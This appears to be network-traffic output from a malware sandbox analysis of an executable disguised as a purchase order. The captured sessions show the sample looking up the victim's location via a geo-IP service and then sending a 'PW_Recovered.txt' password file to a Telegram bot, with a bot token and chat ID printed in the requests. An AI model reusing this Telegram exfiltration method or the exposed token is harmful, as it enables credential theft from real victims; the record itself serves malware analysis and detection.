                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3XAIan3YTm406VSHDiKJ8I4Xm0kmFTk%2FaRdA5CFeUdSGFevidybgztYLl8p8MCEW9BQMmwqhESnwbH0inCDxj2kY9BHkPB28k1jAh%2FH7%2Fl5YONVLwPEM20VAcnUjZc33AFW%2FrMGb"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8f2eefcedbc3191e-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1524&min_rtt=1512&rtt_var=592&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1810291&cwnd=238&unsent_bytes=0&cid=3faab275762e9146&ts=453&x=0"
                                                                                                                                            2024-12-16 13:14:29 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            5192.168.2.449751172.67.177.1344437340C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-16 13:14:33 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2024-12-16 13:14:33 UTC876INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 16 Dec 2024 13:14:33 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 343642
                                                                                                                                            Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xkbYOvaOwRkic0zXM%2BD8KPAvFstuq8ITfz2%2B4nA6YWC4QbcxxttT4fHU0CHYbTGuqmpLe4KKhuRreSwWYbh8%2FvoyQEauoWR1X8bgZKLwTxAzJoF4Mj3smxPgJIEODpnNqdHvTQje"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8f2eefe64f63c354-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1622&min_rtt=1620&rtt_var=613&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1778319&cwnd=178&unsent_bytes=0&cid=3a8ebb0a85999857&ts=457&x=0"
                                                                                                                                            2024-12-16 13:14:33 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            6192.168.2.449753172.67.177.1344437340C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-16 13:14:37 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2024-12-16 13:14:37 UTC882INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 16 Dec 2024 13:14:37 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 343646
                                                                                                                                            Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BOfFlnI2JlI%2B5s5Pey%2F0qv3QSQYHc1u5qArKnrVre5ai76tKvNzq1c3TqPNV%2FWLZcnYj3X8OroHaHPLNJBgU6lnyPxxhKYqQKg3QnMF9oTjGlbHazIzZJT0hClnMJ8s8%2BzBXZ3%2FU"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8f2ef00009f942ad-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1660&min_rtt=1652&rtt_var=635&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1700640&cwnd=242&unsent_bytes=0&cid=e8a805fb964467b7&ts=456&x=0"
                                                                                                                                            2024-12-16 13:14:37 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            7192.168.2.449755172.67.177.1344437340C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-16 13:14:40 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2024-12-16 13:14:40 UTC878INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 16 Dec 2024 13:14:40 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 343649
                                                                                                                                            Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=07vtGzwnG%2BbRRUyjcozGB3HZr02JFBoGL5m7Q86hdDdBzkoLgofn7c%2BYkMUhN%2FldxZvbFsb%2FNW8HOIjPTR2CxyH1w84MRIzlfczAT1YzWfX4uKz0NEwfVh1kyiD8AJ9aCbIA2w0Q"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8f2ef0147f0c4397-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2992&min_rtt=1626&rtt_var=1586&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1795817&cwnd=79&unsent_bytes=0&cid=0fe46f90b4e40023&ts=451&x=0"
                                                                                                                                            2024-12-16 13:14:40 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            8192.168.2.449757172.67.177.1344437340C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-16 13:14:43 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2024-12-16 13:14:44 UTC877INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 16 Dec 2024 13:14:44 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 343653
                                                                                                                                            Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YbM2vtxv4XxztOL9yM11Mo1PqI2PHEa0m3BQ5GRVytY%2Bq1PziwJOaGj5tbAkh6LwXmBZxIYpVYm9WqHwtGSrqG4wUqG2FIKW2OZYOAqmb2auGK1iCGYUILhSkHkQgI%2F%2BfS0kxxcO"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8f2ef029a9350f49-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=5281&min_rtt=1754&rtt_var=2928&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1664766&cwnd=215&unsent_bytes=0&cid=ece921fdfdd3cedc&ts=500&x=0"
                                                                                                                                            2024-12-16 13:14:44 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            9192.168.2.449758149.154.167.2204437340C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-16 13:14:45 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:472847%0D%0ADate%20and%20Time:%2017/12/2024%20/%2015:46:43%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20472847%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                            Host: api.telegram.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2024-12-16 13:14:46 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                            Date: Mon, 16 Dec 2024 13:14:46 GMT
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 55
                                                                                                                                            Connection: close
                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                            2024-12-16 13:14:46 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                            Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            10192.168.2.449759149.154.167.2204437340C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-16 13:14:54 UTC345OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd1f358331f29d
                                                                                                                                            Host: api.telegram.org
                                                                                                                                            Content-Length: 581
                                                                                                                                            2024-12-16 13:14:54 UTC581OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 33 35 38 33 33 31 66 32 39 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d
                                                                                                                                            Data Ascii: --------------------------8dd1f358331f29dContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
                                                                                                                                            2024-12-16 13:14:54 UTC388INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                            Date: Mon, 16 Dec 2024 13:14:54 GMT
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 528
                                                                                                                                            Connection: close
                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                            2024-12-16 13:14:54 UTC528INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 31 37 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 38 39 34 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":17179,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354894,"document"


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            11192.168.2.449792149.154.167.2204437340C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-16 13:15:17 UTC369OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd209fbe2647cc
                                                                                                                                            Host: api.telegram.org
                                                                                                                                            Content-Length: 581
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2024-12-16 13:15:17 UTC581OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 39 66 62 65 32 36 34 37 63 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d
                                                                                                                                            Data Ascii: --------------------------8dd209fbe2647ccContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
                                                                                                                                            2024-12-16 13:15:18 UTC388INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                            Date: Mon, 16 Dec 2024 13:15:18 GMT
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 528
                                                                                                                                            Connection: close
                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                            2024-12-16 13:15:18 UTC528INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 31 38 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 31 38 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":17181,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354918,"document"


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            12192.168.2.449797149.154.167.2204437340C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-16 13:15:19 UTC369OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd20cf8d16151b
                                                                                                                                            Host: api.telegram.org
                                                                                                                                            Content-Length: 581
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2024-12-16 13:15:19 UTC581OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 63 66 38 64 31 36 31 35 31 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d
                                                                                                                                            Data Ascii: --------------------------8dd20cf8d16151bContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
                                                                                                                                            2024-12-16 13:15:20 UTC388INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                            Date: Mon, 16 Dec 2024 13:15:19 GMT
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 528
                                                                                                                                            Connection: close
                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
